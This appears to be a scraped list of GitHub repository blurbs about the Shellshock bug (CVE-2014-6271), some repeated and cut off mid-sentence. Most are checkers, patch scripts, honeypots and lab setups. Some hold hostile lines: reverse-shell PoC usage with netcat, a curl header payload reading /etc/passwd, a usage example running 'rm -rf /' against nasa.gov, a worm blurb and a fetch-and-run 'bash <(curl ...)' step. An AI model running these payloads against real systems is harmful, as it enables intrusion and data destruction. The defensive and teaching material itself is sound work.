CVE-2014-6271

We want to see whether ChatGPT or other AI-LLM (Microsoft New_Bing or Google Bard) are able to help the user to go to some test environment to run cmds to solve the CTF problems (Whether the AI large language models can understand the challenge question and capture the question flags)

ChatGPT(AI LLM)_on_CTF Project Design Purpose: We want to see whether ChatGPT or other AI-LLM (Microsoft New_Bing or Google Bard) are able to help the user to go to some test environment to run cmds to solve the CTF problems (Whether the AI large language models can understand the challenge question and capture the question flags) And we will also show some use cases about ho

North Korea ICT 1 North Korea Internet 2 Redstar OS and Browser Redstar PC Redstar Server RedStar 30 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection [Exploit DB] wwwexploit-dbcom/exploits/40938/ [CVE

Keep the time.

BLOG Keep notes of your study time References Blogs Fastersite Organization: Google Achievements: Google Chrome WebKit Speed Team Lead Keywords: Google Chrome, Speed, WebKit Stoyan’s phpiedcom Organization: Facebook, ex-Yahoo Acheivements: Architect of the YSlow 20 performance tool creator of the smushit Books: Facebook, YSlow, Smushit JavaScript for PHP

Shellshock Vulnerability Checker This script checks if a website is vulnerable to the Shellshock vulnerability (CVE-2014-6271) Summary: The Shellshock vulnerability, also known as Bashdoor, is a security flaw that was discovered in September 2014 in the Unix Bash shell The vulnerability allows attackers to execute arbitrary code or commands on a system by exploiting a flaw in

CVE-2014-6271 Usage go run CVE-2014-6271go wwwexamplecom 80 whoami

A worm pwning Linux and Windows machines

GENESTEALER A worm exploiting CVE-2014-6271/6278 (Shellshock) & CVE-2017-0148 (EternalBlue) Developed by Marcus Agard & Robert T Unnold Link to presentation DISCLAIMER: This code was developed for research purposes As stated in our license's section 4 subsection b, no warranties or declarations of fitness for purpose are implied Please use it responsibly

Experimentálne otestovanie bezpečnostných modulov OS Linux Cieľom tohto repozitára je otestovanie bezpečnostných modulov, SELinux a AppArmor, pomocou zraniteľností CVE Nachádza sa tu niekoľko nakonfigurovaných priečinkov, v ktorých sa nachádza súbor VAGRANT, ktorý slúži na automatick&eac

Shellshock POC | CVE-2014-6271 | cgi-bin reverse shell

CVE-2014-6271 python27 Start listening on your machine nc -l -p 4444 Run python script by the rule below: python shellpocpy <host> <vulnerable CGI> <attackhost/IP> python shellpocpy 101010101 /cgi-bin/status 1010101/4444 Enjoy

渗透相关语法 相关漏洞学习资料，利用方法和技巧合集 web常见漏洞： 注入漏洞(HTML注入/代码注入/header头注入(CRLF)/sql注入/xml注入(xxe/wsdl)) 跨站XSS漏洞、安全配置错误、登录认证缺陷、越权、敏感信息泄露 权限控制不严格、请求伪造 (CSRF)、使用了存在漏洞的组件、点击劫持、SSRF 目录 Ha

Lab-Setup A lab for ethical hacking can be set up using a virtual machine (VM) such as VirtualBox The lab can be used to simulate a real-world environment, allowing users to practice their ethical hacking skills in a safe and secure environment Here is how a basic home lab for ethical hacking can be set up using VirtualBox: Download and install the latest version of VirtualB

Python tutorials

python系列教程(翻译) ~# python >>> import urllib >>> from bs4 import BeautifulSoup >>> url = urlliburlopen("wwwprimalsecuritynet") >>> output = BeautifulSoup(urlread(), 'lxml') >>> outputtitle <title>Primal Security Podcast

Writeups of challenges from pwnable.kr

Empiricism Writeups of few ezpz challenges from pwnablekr, super fun Files can be downloaded at : pwnablekr/playphp Collision This challenge is about (MD5) hash collision, here is the C code: unsigned long hashcode = 0x21DD09EC; unsigned long check_password(const char* p){ int* ip = (int*)p; int i; int res=0; for(i=0; i<5; i++){ res += ip[i]; } return

Exploitation of "Shellshock" Vulnerability. Remote code execution in Apache with mod_cgi

Shellshock Exploitation (CVE-2014-6271) "Shellshock is effectively a Remote Command Execution vulnerability in BASH" This script exploits the vulnerability in the web environment on apache or similar with mod_cgi enabled git clone githubcom/Jsmoreira02/CVE-2014-6271git [Help] Output usage: shellshock_exploitpy [-h]

OSCP Enumeration Cheat Sheet A collection of commands and tools used for conducting enumeration during my OSCP journey Description This is an enumeration cheat sheet that I created while pursuing the OSCP It also includes the commands that I used on platforms such as Vulnhub and Hack the Box Some of these commands are based on those executed by the Autorecon tool Disclaimer

ShellCaçador É uma ferramenta simples para testar a vulnerabilidade do shell ### Shellhunter (softw bug) hellhunter, também conhecido como Bashdoor, é uma família de bugs de segurança no shell Unix Bash, sendo o primeiro deles divulgado em 24 de setembro de 2014 hellhunter pode permitir que um invasor faça com que o Ba

Attack Defend Exercise for Computer System Security

CSEC-742-Project Attack Defend Exercise for Computer System Security (RIT CSEC-742) Gain understanding and experience with vulnerabilities and exploitation Construct a vulnerable system for others to attack and configure a monitoring system to observe attacks Set up a VM, configure it to be susceptible to an exploit, and connect it to the private subnet in the RIT Virtual Lab

This cookbook keeps bash packages latest version

bash Cookbook This cookbook keeps bash packages latest version CVE-2014-6271 seclistsorg/oss-sec/2014/q3/649 Requirements packages apt - manage packages in ubuntu and debian yum - manage packages in RHEL family Usage Just include bash in your node's run_list: { "name":"my_node", "run_list": [ "recipe[bash]" ] }

立ち上げ用issue

About US 趣旨 {何か}の情報の共有・活動場所や機会をつくる 活動内容 定例会 開催頻度は隔週。当分の間は自由に使える場所を使って行ってみる。占領はしないように気をつける。 内容(案です、内容募集してます) 簡単な発表・共有 こんなコード書きました こんなツール・言語便利

another_shellshock_test Some scripts to test for the "ShellShock" vulnerability (CVE-2014-6271) The codename for this scripts is SHIT (SHellshock Injection Test) harrharr Please only use this script in environments where you are allowed to shellshock_localsh Test for the two known (by me) version of this vulnerability on the local system: env x='() { :;}; ec

项目介绍 这是一份开源安全项目清单，收集了一些比较优秀的开源安全项目，以帮助甲方安全从业人员构建企业安全能力。 这些开源项目，每一个都在致力于解决一些安全问题。 项目收集的思路： 一个是关注互联网企业/团队的安全开源项目，经企业内部实践，这些最佳实践值得借鉴。

Laboratorios para las formaciones de Ethical Hacking

eHacking_LABS Laboratorios para las formaciones de Ethical Hacking está en la URL githubcom/antsala/eHacking_LABSgit Carpeta 00 Despliegue del laboratorio Laboratorio 00: Preparación del entorno de laboratorio en Windows Los ejercicios a realizar son: Instalación de VirtualBox para Windows Descarga de las OVAs de la VMs Importación y

收集了一些比较优秀的开源安全项目

项目介绍 这是一份开源安全项目清单，收集了一些比较优秀的开源安全项目，以帮助甲方安全从业人员构建企业安全能力。 这些开源项目，每一个都在致力于解决一些安全问题。 项目收集的思路： 一个是关注互联网企业/团队的安全开源项目，经企业内部实践，这些最佳实践值得借鉴。

This module determine the vulnerability of a bash binary to the shellshock exploits (CVE-2014-6271 or CVE-2014-7169) and then patch that where possible

This module determine the vulnerability of a bash binary to the shellshock exploits (CVE-2014-6271 or CVE-2014-7169) and then patch that where possible Supported platforms: Debian (5, 6, 7) Ubuntus (1204 LTS, 1404 LTS, 1410) RHEL/CentOS (5, 6) Usage class {'shellshock': } Facter provided facter -p shellshock not_vulnera

Shellshock Vulnerability Checker This script checks if a website is vulnerable to the Shellshock vulnerability (CVE-2014-6271) Summary: The Shellshock vulnerability, also known as Bashdoor, is a security flaw that was discovered in September 2014 in the Unix Bash shell The vulnerability allows attackers to execute arbitrary code or commands on a system by exploiting a flaw in

Home-Lab-VM

Home-Lab-VM A home lab for ethical hacking can be set up using a virtual machine (VM) such as VirtualBox The lab can be used to simulate a real-world environment, allowing users to practice their ethical hacking skills in a safe and secure environment Here is how a basic home lab for ethical hacking can be set up using VirtualBox: Download and install the latest version of V

Training scenarios for cyber ranges

Cyber Range Scenarios Training scenarios for cloud-based cyber ranges, initially focused on utilizing Google Cloud Platform Available scenarios Scenario name Primary OS Type OS Versions Vulns CVEs Shell Shock example Linux RHEL 7 Shell Shock, libfutex CVE-2014-6271, CVE-2014-3153 overlayfs example Linux Ubuntu 1404 'overlayfs' Local Privilege Escalation CVE-

XSHOCK Shellshock Exploit

⚡   xShock ShellShock   ⚡ Written by TMRSWRR Version 100 xShock ShellShock (CVE-2014-6271) This tool exploits shellshock Instagram: TMRSWRR 🖼️ Screenshots 🖼️ 📹 How to use 📹 Click on the image 📒 Read Me 📒 All founded directories will be saved in vulnurltxt file The results of the executed commands are saved in respons

Salt recipe for shellshock (CVE-2014-6271)

====================== shellshock bash update This recipe tries to upgrade bash from OS pkg, and falls back to compile bash on systems with no update available Works for us on old ubuntu/debian Bash install script from: askubuntucom/questions/528101/what-is-the-cve-2014-6271-bash-vulnerability-and-how-do-i-fix-it Usage Can be used as an gitfs salt formula: fileserver_

渗透相关 相关漏洞学习资料，利用方法和技巧合集 web常见漏洞： 注入漏洞(HTML注入/代码注入/header头注入(CRLF)/sql注入/xml注入(xxe/wsdl)) 跨站XSS漏洞、安全配置错误、登录认证缺陷、越权、敏感信息泄露 权限控制不严格、请求伪造 (CSRF)、使用了存在漏洞的组件、点击劫持、SSRF 目录 Hacking

A script, in C, to check if CGI scripts are vulnerable to CVE-2014-6271 (The Bash Bug).

ShellShock-CGI-Scan A script, in C, to check if CGI scripts are vulnerable to CVE-2014-6271 (The Bash Bug) Options: -i (local ip-address) -p (port to listen) -l (site list) -t (connection timeout) (Default: 15s) Example: $ /Scanner -i 127001 -p 31337 -l sitestxt -t 5 Starting listen in localhost on port 31337, scan sites in file

Shellshock Vulnerability Scanner

ShellScan ShellScan - A simple Shellshock Vulnerability Scanner in python allows cyber security researchers to explore and discover new application and systems that vulnerable to the ShellShock exploit ShellScan supports different BASH vulnerabilities: CVE-2014-6271 and CVE-2014-6278 to be tested by cyber security researchers in order to explore and discover new applications a

OVAL For CentOS

OVAL-For-EL 中文 (Chinese version) English (English version) Features CentOS OVAL Split oval by severity Automatic update and revise with official security Supports OS Release Upstream Status redhat RHEL5 - RHEL8 wwwredhatcom/security/data/oval/ syncing centos EL5 - EL8 wwwredhatcom/security/data/oval/ syncing Scripts ​ scripts/rh2elpy

My adventures and write-ups from pwnable.kr. Don't look, there are spoilers!

Pwnable Where Nick tries to hack and constantly fails No peeking, there be spoilers below! Toddler's Bottle fd #include <stdioh> #include <stdlibh> #include <stringh> char buf[32]; int main(int argc, char* argv[], char* envp[]){ if(argc<2){ printf("pass argv[1] a number\n"); return 0; } // Convert argv[1

Automated vulnerability creation framework

Introduction The following project is created in order to mitigate the problem of applying vulnerabilities to already existing machines for educational purposes A vulnerability is a programmer's unintended mistake in a program’s source code, misconfiguration or hardware design mistake that can lead to a malicious or unexpected behavior The field of cyber security i

BurbsuiteInArabic المقدمة: أمن الشبكات هو ممارسة تنفيذ تدابير لحماية شبكات الكمبيوتر من الوصول غير المصرح به والهجمات الإلكترونية وخروقات البيانات يلعب دورًا حاسمًا في الحفاظ على سرية وسلامة وتوافر المعلومات التي ي

收集一些比较优秀的开源安全项目，以帮助甲方安全从业人员构建企业安全能力。

项目介绍 这是一份开源安全项目清单，收集了一些比较优秀的开源安全项目，以帮助甲方安全从业人员构建企业安全能力。 这些开源项目，每一个都在致力于解决一些安全问题。 项目收集的思路： 一个是关注互联网企业/团队的安全开源项目，经企业内部实践，这些最佳实践值得借鉴。

Exploitation of "Shellshock" Vulnerability. Remote code execution in Apache with mod_cgi

Shellshock Exploitation (CVE-2014-6271) "Shellshock is effectively a Remote Command Execution vulnerability in BASH" This script exploits the vulnerability in the web environment on apache or similar with mod_cgi enabled git clone githubcom/Jsmoreira02/CVE-2014-6271git [Help] Output usage: shellshock_exploitpy [-h]

Shellshock vulnerability reverse shell

Poc exploit(bash script) shellwebm About the exploit You can get reverse shell with sh file (in Linux) You can get reverse shell with py file in (Windows and Linux) (in windows, you need to install netcat) You must specify the full url with file example: target/cgi-bin/vulnerablesh using for py: python shellshockpy using for

Vulnerability & Scripts WritesUps Welcome aboard my GitHub harbor, where a fleet of Bash scripts awaits to chart the waters of vulnerabilities in diverse systems This repository not only offers these scripts but also provides concise write-ups, acting as lighthouses to guide you through the intricate channels of significant vulnerabilities I encourage you to explore t

A script, in C, to check if CGI scripts are vulnerable to CVE-2014-6271 (The Bash Bug)

ShellShock-CGI-Scan A script, in C, to check if CGI scripts are vulnerable to CVE-2014-6271 (The Bash Bug) Options: -i (local ip-address) -p (port to listen) -l (site list) -t (connection timeout) (Default: 15s) Example: $ /Scanner -i 127001 -p 31337 -l sitestxt -t 5 Starting listen in localhost on port 31337, scan sites in file

CVE-2014-6271 CVE-2014-6271은 "Shellshock"라고 알려진 심각한 취약점으로, 2014년에 발견되어 공개된 취약점이다 이 취약점은 Bash 쉘에서 발견되어 거의 모든 Unix 및 Linux 시스템에 영향을 미치며, 인터넷 상에서 가장 널리 이해되는 취약점 중 하나이다 보안 위협 Shellshock 취약점은 Bash 쉘

CVE Exploit Demonstration

🎥 Exploit for CVE Demonstration CVE-2021-44228 (Log4Shell) 🔗Click Here CVE-2014-6271 (Shell Shock) 🔗Click Here CVE-2022-30190 (Follina) 🔗Click Here 🔎 What is CVE ? 💬 CVE is short for Common Vulnerabilities and Exposures It means publicly known information-security vulnerabilities in publicly released software packages The informaion is then assigend a CV

Analyzing Output From Security Appliance Logs

Security-Onion Diagram showing the lab topology, with the SIEM1 configured to sniff traffic passing over the RT1-LOCAL router To start off this lab we log into our SIEM VM Security Onion and from the desktop we log into Sguil and select siem-eth1 In Sguil, you can see the alerts generated by sample packet captures The ST field shows a color-coded priority indicator f

A scanner to identify the shellshock vulnerability in web applications

ShellshockScan Essentialy what this scanner does is send a specially crafted http header to a website, if that website gives us a 200, 201, 202, 404, 403, 301, 302, 307 or 308 error that means it has rejected our header and therefore is unlikely to be vulnerable About Shellshock CVE-2014-6271, otherwise affectionately known as Shellshock, is potentially the most devastating vu

Cybersecurity Penetration Test Report Contact Information Contact Name Kyle Barbre Contact Title Sr Penetration Tester Contact Phone 8888888888 Contact Email kbarbre@ctmscom Document History Pentesting Team Author Name Title Destiny Nevarez Sr Pentester Derrik Hoke Sr Pentester Tyler Jobson Sr Pentester Ryan Bryne Sr Pentester Katie Diaz Sr

This offline tool is not supported and is provided for informational purposes only.

bashbug-shellshock-test This offline tool is not supported and is provided for informational purposes only This tool is dependent on Python 27 ''' ' ' Shellshock Test - CVE-2014-6271 ' Written by Tripwire VERT (wwwtripwirecom/vert) ' ' This offline tool is not supported and is provided for informational purposes only ' T

Cluster Security for Kubernetes and OpenShift automatically scans these deployments for security risk and policy violations as soon as they are submitted to the cluster.

openshift-network-policies Cluster Security for Kubernetes and OpenShift automatically scans these deployments for security risk and policy violations as soon as they are submitted to the cluster Installing the roxctl CLI To install Red Hat Advanced Cluster Security for Kubernetes you must install the roxctl CLI by downloading the binary You can install roxctl on Linux, Windo

渗透相关语法 相关漏洞学习资料，利用方法和技巧合集 web常见漏洞： 注入漏洞(HTML注入/代码注入/header头注入(CRLF)/sql注入/xml注入(xxe/wsdl)) 跨站XSS漏洞、安全配置错误、登录认证缺陷、越权、敏感信息泄露 权限控制不严格、请求伪造 (CSRF)、使用了存在漏洞的组件、点击劫持、SSRF 目录 Ha

Ansible Role Configures Host to be a Target in a Cyber Range

cyber-range-target This role endeavors to simplify building a host for a cyber range This role is for assessment purposes only Note: This has the potential to render a host vulnerable Use with care Requirements Ansible 24 Role Variables --- # defaults file for cyber-range-target # Which CVE's should be tested on a host cves_to_test: [] selinux_state: enforcing

Performed an RCE by exploiting the "Shellshock" vulnerability and hijacked a webserver.

OSCP Prep - SickOs 11 Note: This box was completed long ago and I am going off of the VMware snapshot I saved after completion, some visuals will be missing and explained instead Objective We must go from visiting a simple website to having root access over the entire web server We'll download the VM from here and set it up with VMware Workstation 16 Once the machine i

This repo is intended to host insecure deployments for educational and demo purposes. These should never be run in privileged mode and should avoid use on public networks.

Insecure Deployment Demo Thanks Rob! We're excited to be joining the Red Hat team As we focus on Red Hat advanced cluster security we want to show you security through a different lense today We believe that security is like on onion It should have layers to it Your defensive strategy should not be broken if one control is bypassed and thats part of the beauty of the m

This Repo Contains Write-UPs for all Tasks

CTF tools & Resources This Repo Contains Write-UPs for all Tasks HERE ARE SOME EXTREMELY USEFUL TOOLS AND COMMANDS Forensics, Linux Tools and Commands Web Misc OSINT Basic linux tools and Commands binwalk -e : //Extracts hidden files steghide extract -sf : //Extracts hidden text in the image xxd : //Prints the Hex version of file grep "element" //finds the

This is a proof-of-prinicple for patching OS X hosts for shell shock

shellshock-Ansible This is a proof-of-prinicple to show that Ansible can be used to patch BASH on OS X Specifically for CVE-2014-6271 and CVE-2014-7169 Work in this project is based off of the posting(s) of alblue - albluebandlemcom Main reference is his evolving post applestackexchangecom/questions/146849/how-do-i-recompile-bash-to-avoid-shellshock-the-remote-exploi

ansible-shellshock This is an ansble playbook to address the bash vulnerability in CVE-2014-6271 and CVE-2014-7169 This playbook automates the remediation items from accessredhatcom/articles/1200223 HOWTO run ansible-playbook -i <hostfile> bashyml -k -K Author Alex Schultz aschultz@next-developmentcom

Just run this script and it'll patch your bash. Note: Install Xcode developer tools before running it!

Check this thread on stackexchange The script has been taken from there: applestackexchangecom/questions/146849/how-do-i-recompile-bash-to-avoid-the-remote-exploit-cve-2014-6271 IMPORTANT: Install Xcode before executing the script! Usage git clone git@githubcom:mdix/OSX-bash-fixgit cd OSX-bash-fix chmod +x *sh /buildsh # If buildsh went well, your patched bash ha

Este projeto tem como intuito facilitar a utilização do NMAP com um sistema mais interativo para o usuário via terminal.

LAZY_NMAP_HUNTER Este projeto tem como intuito facilitar a utilização do NMAP com um sistema mais interativo para o usuário via terminal O NMAP é uma ferramenta completa, com inúmeras funcionalidades, entretanto requer que o usuário tenha certa maestria com ele para que extraia 100% de sua capacidade, o Lazy_NMAP_Hunter vem entã

Performed an RCE by exploiting the "Shellshock" vulnerability and hijacked a webserver.

OSCP Prep - SickOs 11 Note: This box was completed long ago and I am going off of the VMware snapshot I saved after completion, some visuals will be missing and explained instead Objective We must go from visiting a simple website to having root access over the entire web server We'll download the VM from here and set it up with VMware Workstation 16 Once the machine i

A docker container vulnerable to Shellshock - CVE-2014-6271

shellshock-victim-host A docker container vulnerable to Shellshock - CVE-2014-6271 Run podman build -t shellshock-victim podman run -it -p 80:8080 shellshock-victim Note: Builds with docker as well The vulnerable app will be deployed on : localhost:8080/victimcgi - Vulnerable endpoint localhost:8080/safecgi - Safe endpo

Wrapper for /bin/bash that mitigates 'shellshock'

bash-shellshock wrapper This is a small wrapper around /bin/bash that refuses to start bash if any environment variables start with '(' It can also be run in a log-only mode and a mode that strips these 'bad' environment variables You can install this as a temporary workaround if you don't fully trust the latest patches for CVE-2014-6271 and CVE-2014

TOOLS TO MASTER dirb (dirbuster) gobuster nmap hydra smbclient rpcclient enum4linux dnsdumpsterio or dnsrecon netcraftcom smbmap arp-scan wireshark dig METASPLOIT AND MSFVENOM (at least rev tcp meterpreter payload) whatweb davtest cadaver crackmapexec mimikatz / kiwi Assessment Methodologies: Information Gathering Information Gathering Information Gathering is the first s

CVE-2014-6271 RCE tool

================================================================================================ BadBash is a CVE-2014-6271 RCE exploit tool The basic version only checks for the HTTP CGI site and only provides netcat reverse shell on port 1234 Developer : Andy Yang Version : 010 License : GPLv3 ===============================================================================

CVE-2014-6271 Bash Shellshock (and Aftershock) Tester for Ansible Install Ansible docsansiblecom/intro_installationhtml Add servers to inventory file (example): username@ip Copy your public key to remote servers' ssh/authorized_keys execute test $ ansible-playbook -i inventory siteyml

WebApp Honeypot for detecting Shell Shock exploit attempts

Shockpot Shockpot is a web app honeypot designed to find attackers attempting to exploit the Bash remote code vulnerability, CVE-2014-6271 Shockpot can be run as a standalone honypot or easily deployed by Modern Honey Network (MHN): githubcom/Pwnlandia/mhn Installation virtualenv env env/bin/activate pip install -r requirementstxt

Plugins for nagios used by Voxer, made specifically for SmartOS

Voxer Nagios Plugins Plugins for nagios used by Voxer, made specifically for SmartOS Plugins check_shellshock Check bash for CVE-2014-6271 (shellshock) $ check_shellshock ok: bash is secure against shellshock You can pass an optional binary to check as the first argument, defaults to bash in your $PATH $ check_shellshock /bin/bash critica

Exploitation of "Shellshock" Vulnerability. Remote code execution in Apache with mod_cgi

Shellshock Exploitation (CVE-2014-6271) "Shellshock is effectively a Remote Command Execution vulnerability in BASH" This script exploits the vulnerability in the web environment on apache or similar with mod_cgi enabled git clone githubcom/Jsmoreira02/CVE-2014-6271git [Help] Output usage: shellshock_exploitpy [-h]

Project 9 - Honeypots Honeypots Deployed: I used the Modern Honey Network (MHN) to complete the assignment for Week 9 In total, I created five Ubuntu 1404 honeypots All of the honeypots, including the MHN admin web application, were hosted in the Google Cloud Honeypots: Ubuntu 1404- Dionaea with HTTP: Goal is to trap malware that exploits vulnerabilties in an exposed net

Update bash on lenny and later debian after shellshock

fix-bash-bug Update bash on lenny and later debian after shellshock Simple update for debian stable Add squeeze-lts repository for previous stable (should have already been there) Compile bash from source for previous previous stable (only tested with lenny) Up to patchlvel 54 for CVE-2014-7169 Up to patchlvel 55 Compile bash 32 from source for Debian Lenny to patch CVE-2014

I will be learning and updating documentation consistently on Network Security and Database Vulnerabilities

30 days of Network security and Database vulnerabilities I will be learning Network security and Database vulnerabilities for 30 days and I will be updating daily about my progress and understanding Day 1 Day 2 Day 3 Day 4 Day 5 Day 6 Day 7 Day 8 Day 9 Day 10 Day 11 Day 12 Day 13 Day 14 Day 15 Day 16 Day 17 Day 18 Day 19 Day 20 Day 21 Day 22 Day 23 Day 24 Day 25 Day 26 Day 27

CVE-2014-6271

CVE-2014-6271 Python implementation of CVE-2014-6271: IP Fire (<=215) ShellShock RCE Based on the Metasploit module for the same exploit (EDB ID: 34839) Exploit is automatic See /CVE-2014-6271py --help for a full range of switches Warning: The code in this repository may be used for academic/ethical purposes only The author does not condone the use of this exploit f

This Repo is PoC environment of CVE-2014-6271(https://nvd.nist.gov/vuln/detail/cve-2014-6271).

CVE-2014-6271-Apache-Debian Overview This Repo is PoC environment of CVE-2014-6271 You can deploy web service including vulernability using apache2 container image Preparation Image Build Build insecure image from Dockerfile # docker build -t cve-2014-6271-apache-debian:buster /insecure-base-image/ # docker build -t training-website-poc:v10 /web-insecure/

cve-2014-6271

CVE-2014-6271 This is part of Cved: a tool to manage vulnerable docker containers Cved: githubcom/git-rep-src/cved Image source: githubcom/cved-sources/cve-2014-6271 Image author: githubcom/Medicean/VulApps/tree/master/b/bash/shellshock1_CVE-2014-6271

a auto script to fix CVE-2014-6271 bash vulnerability

bash-up a auto script to fix CVE-2014-6271 bash vulnerability

Real time analysis of information security vulnerabilities

Security Threats and Analysis Real-time analysis of information security vulnerabilities Threat Name CVE-2014-6271 ShellShock

A python script to enumerate CGI scripts vulnerable to CVE-2014-6271 on one specific server

shellshock-cgi A python script to enumerate CGI scripts vulnerable to CVE-2014-6271 on one specific server Usage $ python testingpy --server 17216255130 --listen 172162551 ##Example Return: [+] Testing if 17216255130 is vulnerable to CVE-2014-6271 via CGI [+] Listening for incoming connections on the following socket 17216255

Bonus assignment for BSY

Bonus assignment Author: Tomáš Hořovský Email: horovtom@felcvutcz This was the final bonus assignment for the BSY course at ČVUT Prague As an entry point for this assignment, we got a pcap file and an IP address of submission server Part 1 First, I went to the submission server and entered some random data to get all the different questions: What is

Ansible role to check the CVE-2014-6271 vulnerability

bash-fix-exploit A tiny role that checks to see if the CVE-2014-6271 exploit is still valid Use at your own risk Read about the exploit here: communityrapid7com/community/infosec/blog/2014/09/25/bash-ing-into-your-network-investigating-cve-2014-6271 Requirements Assumes that you're using bash as your shell Role Variables update_bash - defaults to "no

Aprovechar muchos métodos de inyección para shellshock.

Evil-Shock Description Evil-Shock is a powerful tool made to exploit Shellshock, what's special with Evil-Shock is that it doesn't base his attacks on one parameter, example another tool might inject a simple "echo Vulnerable" and see if the server executes that In many case the server wont execute that command but can execute another command ;) Evil-Shock

Simple script to check for CVE-2014-6271

shocknaww Simple script to check for CVE-2014-6271 Example Usage /shocknawwpy foobar/cgi-bin/foo Sample vulnerable environment From the parent directory, run the following python -m CGIHTTPServer Now use shocknaww against your localhost test server /shocknawwpy 127001:8000/te

CLI tool to check via node.js if you have a vulnerable bash Shellshock

CLI tool to check via nodejs if you have a vulnerable bash Shellshock (CVE-2014-6271) Install npm install shellshock -g Execute shellshock Output ✗ vulnerable bash or ✓ bash not vulnerable Contributors neydroid

Detailed description and usage, see: weibocom/1363173330/BoKSHl0YE CVE-2014-6271 CVE-2014-7169 remote code execution through bash twittercom/taviso/status/514887394294652929 官方补丁不靠谱，这个修复了绕过问题。 成功patch了bash 42 版本

ShellShock Test

Shellshock Test ShellShock test checks for the recent CVE-2014-6271 Live : wwwdr4cun0com/shellshock/ Prerequisites : Apache Server running php If you want to use my proxy,contact me Questions and suggestions can be sent to : dhaval(at)dr4cun0com

Shellshock vulnerability attacker

CVE-2014-6271 Script to attack shellshock vulnerability [!] Usage: /ShockZaum -u 'nasagov' -c 'rm -rf /' -p '/cgi-bin/alienscgi'

docker_CVE-2014-6271 docker build -t DOCKERIMAGENAME /path/to/dockerfile_directory docker run -it -d -p 8080:80 DOCKERIMAGENAME verify execution with: docker ps verify web server execution: localhost:8080 exploit vulnerability : curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \localhost:8080/cgi-bin/vulnerable

ss-6271 Shell Shock CVE-6271 test script This quickly-written script comes pre-packed with the October 2015 release update of Weakerthan Linux 6 I coded it after taking the Pentesterlab's course on CVE-6271 Shell Shock: (pentesterlabcom/exercises/cve-2014-6271/course) dependencies gnome-terminal nc Bash

Quick and dirty nessus .audit file to check is bash is vulnerable to CVE-2014-6271

Nessus_CVE-2014-6271_check Quick and dirty nessus audit file to check is bash is vulnerable to CVE-2014-6271

This is an individual assignment for secure network programming

CVE-2014-6271-Shellshock- This is an individual assignment for secure network programming

CVE-2014-6271 An automated way to fix bash Testing for the Vulnerability You can determine if you are vulnerable by executing this test: env x='() { :;}; echo vulnerable' bash -c 'echo hello' Fixing Vulnerability Run this on the command line You may be prompted to enter your password bash <( curl -s rawgithubusercontentcom/mattclegg/CVE-20

PoC collection

PoC Collection Index CVE-2014-4114 -- PowerPoint RCE CVE-2014-6271 -- Shell Shock CVE-2014-6332 -- VBScript RCE in IE CVE-2015-1328 -- Ubuntu local root exploit

shellshockersh This is ShellScript for CVE-2014-6271 ReverseShell

😱 Python library and utility for CVE-2014-6271 (aka. "shellshock")

pyshellshock Python library and utility for CVE-2014-6271

Splunk Investigation 4 Lab Description Security Information and Event Monitoring Using Splunk SIEM Lab) Splunk Investigation 4 Solution Languages and Utilities Used PowerShell Splunk Environments Used Windows 10 Program walk-through Splunk Investigation 4 Certification of completion Question 1 - Click on Dashboards and go to Splunk Investigation 4 How many Suricata

CVE 2014-6271 PoC Tool by kaitoY

CVE 2014-6271 PoC Tool by kaitoY kaitoy@qqcom Usage: shellshockpy -u <url> test shellshockpy -u <url> exec -c <command> shellshockpy -u <url> get Manual commands: curl -i -X HEAD "<url>" -A '() { :;}; echo "Warning: Server Vulnerable"'

This will download Apple's bash source, patch it, build it, and create a pkg file for you

shellshock-patch-osx This will download Apple's bash source, patch it, build it, and create a pkg file for you, then optionally wrap it in a dmg or zip file to make distributing it easier This applies the following patches: bash32-052 - CVE-2014-6271 (aka shellshock) bash32-053 - CVE-2014-7169 (aka aftershock) bash32-054 - CVE-2014-6277 (another bash bug) Pre-requisites

OS X bash-3.2 fix (with import-functions patch)

bash-32 for OS X 109 and 1010 NOTE WELL: This software is not applicable to 1011 unless disabling the File System Protections GNU bash for OS X Current version: 3257 NOTE: EXPERIMENTAL: functions from environment variables are NOT imported as default when the import-functions option is compiled The master branch has this option enabled, for better security You can v

⚡   xShock ShellShock   ⚡ Written by TMRSWRR Version 100 xShock ShellShock (CVE-2014-6271) This tool exploits shellshock Instagram: TMRSWRR 🖼️ Screenshots 🖼️ 📹 How to use 📹 Click on the image 📒 Read Me 📒 All founded directories will be saved in vulnurltxt file The results of the executed commands are saved in respons

OSCP CheatSheet

oscp-cheatsheet This repository describes cheat sheet and knowledge for OSCP Contents Table of Contents Enumeration Network nmap Example Options RustNmap Windows Privilege Escalation PowerUpps1 Scan SeImpersonatePrivilege PrintSpoofer Linux Privilege Escalation LinPEAS pspy Password Cracking hydra Example John the ripper Example hashcat Webpages H

Shockpot Shockpot is a web app honeypot designed to find attackers attempting to exploit the Bash remote code vulnerability, CVE-2014-6271 Shockpot can be run as a standalone honypot or easily deployed by Modern Honey Network (MHN): githubcom/Pwnlandia/mhn Installation virtualenv env env/bin/activate pip install -r requirementstxt

CVE-2014-6271 Python implementation of CVE-2014-6271: IP Fire (<=215) ShellShock RCE Based on the Metasploit module for the same exploit (EDB ID: 34839) Exploit is automatic See /CVE-2014-6271py --help for a full range of switches Warning: The code in this repository may be used for academic/ethical purposes only The author does not condone the use of this exploit f

IPFire authenticated RCE, rewritten for Python 3.

CVE-2014-6271 IPFire authenticated RCE, rewritten for Python 3